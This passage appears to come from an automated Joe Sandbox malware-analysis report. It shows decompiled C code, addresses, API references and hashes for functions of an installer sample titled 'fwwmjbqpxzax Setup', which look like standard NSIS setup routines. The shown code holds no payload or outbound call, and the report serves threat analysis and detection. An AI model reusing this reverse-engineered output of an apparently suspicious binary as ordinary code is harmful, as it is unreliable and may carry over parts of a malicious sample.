							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                          0x0040201b
                          0x00402025
                          0x0040202e
                          0x00402038
                          0x00402041
                          0x0040204b
                          0x0040204f
                          0x0040204f
                          0x00402054
                          0x00402065
                          0x0040206d
                          0x0040214d
                          0x0040214d
                          0x00402154
                          0x00402073
                          0x00402073
                          0x00402084
                          0x00402088
                          0x0040208e
                          0x00402098
                          0x0040209a
                          0x004020a5
                          0x004020a8
                          0x004020b5
                          0x004020b7
                          0x004020b9
                          0x004020c0
                          0x004020c3
                          0x004020c3
                          0x004020c6
                          0x004020d0
                          0x004020d8
                          0x004020dd
                          0x004020e9
                          0x004020e9
                          0x004020ec
                          0x004020f5
                          0x004020f8
                          0x00402101
                          0x00402106
                          0x00402118
                          0x00402127
                          0x00402129
                          0x00402135
                          0x00402135
                          0x00402127
                          0x00402137
                          0x0040213d
                          0x0040213d
                          0x00402140
                          0x00402146
                          0x0040214b
                          0x00402160
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040214b
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?), ref: 00402065
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 123533781-2935972921
                          • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                          • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                          • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                          0x00402648
                          0x0040265c
                          0x00402667
                          0x00402668
                          0x004027a3
                          0x0040264a
                          0x0040264a
                          0x0040264c
                          0x0040264e
                          0x0040264e
                          0x00402880
                          0x0040288c

                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                          • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                          • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403F7F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x8c223a
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x8c1cb8
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x8c0fa0
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}





















                          0x00403f8f
                          0x004040b5
                          0x00404111
                          0x00404115
                          0x004041ec
                          0x004041ee
                          0x004041ee
                          0x004041f4
                          0x004041f4
                          0x004041f7
                          0x00000000
                          0x004041fe
                          0x00404123
                          0x00404125
                          0x0040412f
                          0x0040413a
                          0x0040413d
                          0x00404140
                          0x0040414b
                          0x0040414e
                          0x00404155
                          0x00404163
                          0x0040417b
                          0x00404183
                          0x0040418e
                          0x0040419e
                          0x004041a0
                          0x004041a0
                          0x00404155
                          0x004041aa
                          0x00000000
                          0x004041b5
                          0x004041b9
                          0x004041ca
                          0x004041ca
                          0x004041d0
                          0x004041de
                          0x004041de
                          0x00000000
                          0x004041e2
                          0x004041aa
                          0x004040c0
                          0x00000000
                          0x004040d4
                          0x004040d4
                          0x004040da
                          0x004040da
                          0x004040e0
                          0x00000000
                          0x00000000
                          0x00404105
                          0x00404107
                          0x0040410c
                          0x00000000
                          0x0040410c
                          0x004040c0
                          0x00403f95
                          0x00403f98
                          0x00403f9d
                          0x00403f9f
                          0x00403fae
                          0x00403fae
                          0x00403fb0
                          0x00403fb5
                          0x00403fb8
                          0x00403fba
                          0x00403fbf
                          0x00403fc8
                          0x00403fce
                          0x00403fda
                          0x00403fdd
                          0x00403fe6
                          0x00403feb
                          0x00403fee
                          0x00403ff3
                          0x0040400a
                          0x00404011
                          0x00404024
                          0x00404027
                          0x0040403c
                          0x0040403e
                          0x00404043
                          0x00404048
                          0x0040404d
                          0x0040404d
                          0x0040405c
                          0x0040406b
                          0x0040406d
                          0x00404083
                          0x00404092
                          0x00404094
                          0x00000000

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: @.B$N$open
                          • API String ID: 3615053054-3815657624
                          • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                          • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x8c0fa0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "fwwmjbqpxzax Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                          0x0040100a
                          0x00401039
                          0x00401047
                          0x0040104d
                          0x00401051
                          0x0040105b
                          0x00401061
                          0x00401064
                          0x004010f3
                          0x00401089
                          0x0040108c
                          0x004010a6
                          0x004010bd
                          0x004010cc
                          0x004010cf
                          0x004010d5
                          0x004010d9
                          0x004010e4
                          0x004010ed
                          0x004010ef
                          0x004010ef
                          0x00401100
                          0x00401105
                          0x0040110d
                          0x00401110
                          0x00401112
                          0x00401118
                          0x0040111f
                          0x00401126
                          0x00401130
                          0x00401142
                          0x00401156
                          0x00401160
                          0x00401165
                          0x00401165
                          0x00401110
                          0x0040116e
                          0x00000000
                          0x00401178
                          0x00401010
                          0x00401013
                          0x00401015
                          0x00401019
                          0x0040101f
                          0x0040101f
                          0x00000000

                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32 ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,fwwmjbqpxzax Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$fwwmjbqpxzax Setup
                          • API String ID: 941294808-1473510216
                          • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                          • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x8c0fa0
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                          0x004057d9
                          0x004057e0
                          0x004057e4
                          0x004057ed
                          0x004057f1
                          0x00405930
                          0x00405930
                          0x00000000
                          0x00405930
                          0x004057f1
                          0x004057fd
                          0x00405813
                          0x0040583b
                          0x00405846
                          0x0040584a
                          0x0040586a
                          0x0040586c
                          0x00405871
                          0x0040587b
                          0x00405888
                          0x0040588d
                          0x00405892
                          0x00405896
                          0x00000000
                          0x00000000
                          0x004058a5
                          0x004058a7
                          0x004058b4
                          0x004058b8
                          0x00405929
                          0x0040592a
                          0x00000000
                          0x004058d4
                          0x004058e1
                          0x00405946
                          0x0040594d
                          0x004058f4
                          0x004058f4
                          0x004058f6
                          0x004058ff
                          0x0040590a
                          0x0040591c
                          0x00405923
                          0x00000000
                          0x00405923
                          0x0040594f
                          0x00405950
                          0x00405955
                          0x00405957
                          0x00405964
                          0x00405964
                          0x00405968
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405959
                          0x00405959
                          0x0040595c
                          0x0040595f
                          0x00405960
                          0x00000000
                          0x00405959
                          0x004058ec
                          0x004058f1
                          0x00000000
                          0x004058f1
                          0x004058b8
                          0x00405815
                          0x00405820
                          0x00405829
                          0x0040582d
                          0x00000000
                          0x00000000
                          0x0040582d
                          0x0040593a

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • CloseHandle.KERNEL32(00000000), ref: 00405820
                          • GetShortPathNameA.KERNEL32 ref: 00405829
                          • GetShortPathNameA.KERNEL32 ref: 00405846
                          • wsprintfA.USER32 ref: 00405864
                          • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058C4
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040591C
                          • GlobalFree.KERNEL32(00000000), ref: 00405923
                          • CloseHandle.KERNEL32(00000000), ref: 0040592A
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                          • String ID: %s=%s$(&B$[Rename]
                          • API String ID: 3772915668-1834469719
                          • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                          • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                          0x00405ce5
                          0x00405ced
                          0x00405d01
                          0x00405d01
                          0x00405d07
                          0x00405d14
                          0x00405d14
                          0x00405d15
                          0x00405d17
                          0x00405d1b
                          0x00405d1d
                          0x00405d26
                          0x00405d28
                          0x00405d42
                          0x00405d4a
                          0x00405d4a
                          0x00405d4f
                          0x00405d51
                          0x00405d53
                          0x00405d57
                          0x00405d58
                          0x00405d5b
                          0x00405d63
                          0x00405d65
                          0x00405d69
                          0x00000000
                          0x00000000
                          0x00405d6f
                          0x00405d74
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405d74
                          0x00405d79

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
